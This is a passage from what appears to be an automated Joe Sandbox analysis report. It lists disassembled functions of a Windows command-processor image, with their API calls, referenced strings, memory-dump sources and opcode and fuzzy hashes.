                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcschr$Close$CreateOpenValueiswspace
                                                                                                                                                                                                                          • String ID: Software\Classes$p~du
                                                                                                                                                                                                                          • API String ID: 1047774138-3099581464
                                                                                                                                                                                                                          • Opcode ID: 3e385b8c51f8c17f4859b82df36d8fc96b1b98769af9067aa2d29a505415f683
                                                                                                                                                                                                                          • Instruction ID: c8a5c29be7e1ae0734a06af0ded3f20d126a60a7996ea38324c6e77ab12fbc96
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3e385b8c51f8c17f4859b82df36d8fc96b1b98769af9067aa2d29a505415f683
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7314F75F04714DBDF08ABA998527EDB7B2AF58710F64402EE002BB291EF715C008BA0
                                                                                                                                                                                                                          Function 001B5E03 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 92registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Classes,00000000,02000000,?,001BCCE0,0000001C,001B6931), ref: 001B5E32
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BCA7
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: iswspace.MSVCRT ref: 0019BD1D
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD39
                                                                                                                                                                                                                            • Part of subcall function 0019BC30: wcschr.MSVCRT ref: 0019BD5D
                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000003), ref: 001B5EFB
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcschr$CloseOpeniswspace
                                                                                                                                                                                                                          • String ID: Software\Classes$p~du
                                                                                                                                                                                                                          • API String ID: 2439148603-3099581464
                                                                                                                                                                                                                          • Opcode ID: 0e1b827f37afe1ec80cc765742a298f122b4dbb01569cb4d255222bd007cd3de
                                                                                                                                                                                                                          • Instruction ID: 749688a853a5b2c5560bf3b74dfcf0fe4d0d6a735e4c7b6a0235087fa2f7e01c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e1b827f37afe1ec80cc765742a298f122b4dbb01569cb4d255222bd007cd3de
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54317371E146148FDF18EFA9C8527EDB7B2AF58710F24402EE016B7291EB719D00DB64
                                                                                                                                                                                                                          Function 001BB222 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001BB25E
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • _wcslwr.MSVCRT ref: 001BB2D2
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,?,?,?), ref: 001BB30B
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$_wcslwr
                                                                                                                                                                                                                          • String ID: [%s]
                                                                                                                                                                                                                          • API String ID: 886762496-302437576
                                                                                                                                                                                                                          • Opcode ID: 1bae1b0139d68dc30620f7f76a3d4a79e45ca16e22b57ace3ba792345bdff577
                                                                                                                                                                                                                          • Instruction ID: dda76dd3e071a7811c9a0a46ff2fc28699586332d7c4e5ae066de205c6cd9148
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1bae1b0139d68dc30620f7f76a3d4a79e45ca16e22b57ace3ba792345bdff577
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80318071B05219ABDF10DBA9DCC5BEEB7F8AF18350F0800A9E505E3241EB74DE448B90
                                                                                                                                                                                                                          Function 001A4BAF Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsnicmp
                                                                                                                                                                                                                          • String ID: /-Y$COPYCMD
                                                                                                                                                                                                                          • API String ID: 1886669725-617350906
                                                                                                                                                                                                                          • Opcode ID: d53621bd395eaa715bf090b8f706946cec8fbd5bf0923f3b85dc2b02457344e0
                                                                                                                                                                                                                          • Instruction ID: daf4655f5451aa4521528e6fcea3aa5fbf259246af8b78389d6703f863e3b637
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d53621bd395eaa715bf090b8f706946cec8fbd5bf0923f3b85dc2b02457344e0
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF21A07DA00211ABCF2C8B099C457FFB6F5EFCA364B610055E84997244EBF0CE41C260
                                                                                                                                                                                                                          Function 00199E09 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00199E8E: iswspace.MSVCRT ref: 00199E9E
                                                                                                                                                                                                                          • iswspace.MSVCRT ref: 00199E28
                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 00199E79
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: iswspace$_wcsnicmp
                                                                                                                                                                                                                          • String ID: off
                                                                                                                                                                                                                          • API String ID: 3989682491-733764931
                                                                                                                                                                                                                          • Opcode ID: a76dff0610145cdd2048147bacbb8bb809288c0836b180448bb8b19fbbbde23e
                                                                                                                                                                                                                          • Instruction ID: c57820e572684a2a2d2e8fa6243f84e77703b80c1630afd496630e12916054c5
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a76dff0610145cdd2048147bacbb8bb809288c0836b180448bb8b19fbbbde23e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15112626705311AADF38A26D5C5AB3F63589FE1F55B29002EFD0AEA0C0FB41CD80D1A3
                                                                                                                                                                                                                          Function 001B5166 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 001A727B: __iob_func.MSVCRT ref: 001A7280
                                                                                                                                                                                                                          • fprintf.MSVCRT ref: 001B5182
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: __iob_funcfprintf
                                                                                                                                                                                                                          • String ID: CMD Internal Error %s$%s$Null environment
                                                                                                                                                                                                                          • API String ID: 620453056-2781220306
                                                                                                                                                                                                                          • Opcode ID: 125d70aeb357fa0d69991199f4bfaa13e5cc9615fe5c8590fd2d0d1a46b20800
                                                                                                                                                                                                                          • Instruction ID: febc758b7d9d585f3953663de92346726fa5d223d3baa4dbe3972ea14fdaa395
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 125d70aeb357fa0d69991199f4bfaa13e5cc9615fe5c8590fd2d0d1a46b20800
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B201263BA44B129ACB347B5CAC06BE3A365DBE1324365052BEC6A93180FBA19E438555
                                                                                                                                                                                                                          Function 001B3500 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 26libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(ntdll.dll), ref: 001B351B
                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RtlDllShutdownInProgress), ref: 001B352C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                          • String ID: RtlDllShutdownInProgress$ntdll.dll
                                                                                                                                                                                                                          • API String ID: 1646373207-582119455
                                                                                                                                                                                                                          • Opcode ID: a64c2a4d5c737b124c9161e8ce473a3a6f5a94be2c1570dce70bc126285de189
                                                                                                                                                                                                                          • Instruction ID: 3ff05778c9f83d4bd0d0da0ec24d01f86b903a125d6e178fd04ccfb124f7b488
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a64c2a4d5c737b124c9161e8ce473a3a6f5a94be2c1570dce70bc126285de189
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37E01A31E43230AB8F319F34BD09ADA3BD8AB44BA030A0256F819D3A64D7648D818FD1
                                                                                                                                                                                                                          Function 001B38F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(kernelbase.dll), ref: 001B38FB
                                                                                                                                                                                                                          • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,RaiseFailFastException), ref: 001B3907
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                          • String ID: RaiseFailFastException$kernelbase.dll
                                                                                                                                                                                                                          • API String ID: 1646373207-919018592
                                                                                                                                                                                                                          • Opcode ID: 2b17dc8ad20e19714fb8f3111a778444d578e0b909525623e8fa230271210483
                                                                                                                                                                                                                          • Instruction ID: fd31b4342823eb743266404ea9e1e11fd0ce28a29d4790e188f2c86cd8c86e3a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b17dc8ad20e19714fb8f3111a778444d578e0b909525623e8fa230271210483
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F6E08C32502228BBCF211FA1DC0CC8BBF19EF447A17440022F918825208B728960CAA1
                                                                                                                                                                                                                          Function 001A52F5 Relevance: 6.2, APIs: 4, Instructions: 185COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001A539E
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,00007FE9), ref: 001A54C6
                                                                                                                                                                                                                            • Part of subcall function 00198E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,001D8BF0,00000000,?), ref: 00198EC3
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$CurrentDirectory
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 168429351-0
                                                                                                                                                                                                                          • Opcode ID: 6d4ca9cf11395636657681dfb545c289d62c74ea0a64173579fee51a4e7f03f4
                                                                                                                                                                                                                          • Instruction ID: a6a4a87de8346a1d1fd6b4a620e9daaf2f4703a91c26faef2e34f45891b24ab3
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d4ca9cf11395636657681dfb545c289d62c74ea0a64173579fee51a4e7f03f4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7761787560C7019FD328DF28D4856ABBBE6FF89300F11492EF989C7250EB709984CB96
                                                                                                                                                                                                                          Function 0019AA75 Relevance: 6.2, APIs: 4, Instructions: 182COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsnicmp$wcschr
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3270668897-0
                                                                                                                                                                                                                          • Opcode ID: 6b30806eba700595f41847aaab050155483b5dfd31c2cb4cf6d2522728c3878f
                                                                                                                                                                                                                          • Instruction ID: 43d2b04e3e018bb88dd3b46dd158da9bf257fad4086f0a90f13778db261c3fbb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6b30806eba700595f41847aaab050155483b5dfd31c2cb4cf6d2522728c3878f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94512C397002159BDF24EB68D855B7E73A6EF95740B54841DE8439B2C1FB704E82D3D1
                                                                                                                                                                                                                          Function 0019DED0 Relevance: 6.2, APIs: 4, Instructions: 162COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: iswdigit
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3849470556-0
                                                                                                                                                                                                                          • Opcode ID: 66c6a5c8a20a0a38cef2d3c081d036421b26813e7b105ab92f2be11c2b7a50a5
                                                                                                                                                                                                                          • Instruction ID: b6c43af99993f81ff852a9abd8e8c902dc7139ee19fbbaf0fc7ea58fb170c15e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 66c6a5c8a20a0a38cef2d3c081d036421b26813e7b105ab92f2be11c2b7a50a5
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3511775A05200DBCF18DF59E84527DB7B1FF84300F6981AAE8028B791EB75DD82DB81
                                                                                                                                                                                                                          Function 001A1CD5 Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D3A
                                                                                                                                                                                                                          • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D44
                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D57
                                                                                                                                                                                                                          • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,001980F4,00000000,00000000,-00000001,00000000,?,00000000), ref: 001A1D61
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorMode$FullNamePath
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 268959451-0
                                                                                                                                                                                                                          • Opcode ID: 97ab789ed37b9362b3bf8e36a43ec6158be3c256d8b58415626572b27f38cd29
                                                                                                                                                                                                                          • Instruction ID: 8e9bec0418faef4e025c19eeead1b5765f3ac0e61b9e11cdfd7356efbcbb53f4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 97ab789ed37b9362b3bf8e36a43ec6158be3c256d8b58415626572b27f38cd29
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F312C3D100101BBCF28DFA8C85597FB7A6EF49304B69891DF906CB650E7B5AE42C750
                                                                                                                                                                                                                          Function 0019C570 Relevance: 6.1, APIs: 4, Instructions: 101memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0019C5BD
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 0019C5C4
                                                                                                                                                                                                                          • _setjmp3.MSVCRT ref: 0019C630
                                                                                                                                                                                                                          • VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,00008000,00000000,00000000,00000000,00000000,00000000), ref: 0019C69D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: FreeHeap$ProcessVirtual_setjmp3
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2613391085-0
                                                                                                                                                                                                                          • Opcode ID: b9b6651607f9868becdcc57851e4e6c0ce4d5dde16996516b156103326686f3e
                                                                                                                                                                                                                          • Instruction ID: f5d95787c96efbd21d09a5f94f7dd7a5359e468ac48c7164af6145aacdb1415e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9b6651607f9868becdcc57851e4e6c0ce4d5dde16996516b156103326686f3e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 473189B0B013109BEF10DF28A944B6A7BB4FB58704F25452AE849DB754EB74D884CB91
                                                                                                                                                                                                                          Function 001B63F3 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • longjmp.MSVCRT(001D0A30,00000001,?,?,001ABFD6,?,?,?,?,?,?,?,?), ref: 001B64D4
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000), ref: 0019DCE1
                                                                                                                                                                                                                            • Part of subcall function 0019DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0019ACD8,00000001,?,00000000,00198C23,-00000105,001BC9B0,00000240,001A1E92,00000000,00000000,001AACE0,00000000,00000000), ref: 0019DCE8
                                                                                                                                                                                                                            • Part of subcall function 001A72EF: ApiSetQueryApiSetPresence.API-MS-WIN-CORE-APIQUERY-L1-1-0(00191028,?,?,?,001AF12E,001BCA50,00000018,001A1E7C,00000000,00000000,001AACE0,00000000,00000000,?,00000104,?), ref: 001A7314
                                                                                                                                                                                                                          • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00000000,000000FF,00000000,00000000,?,?,001ABFD6), ref: 001B646C
                                                                                                                                                                                                                          • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,00000000,000000FF,00000000,00000000,?,?,001ABFD6), ref: 001B6474
                                                                                                                                                                                                                          • SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,001ABFD6), ref: 001B64B6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
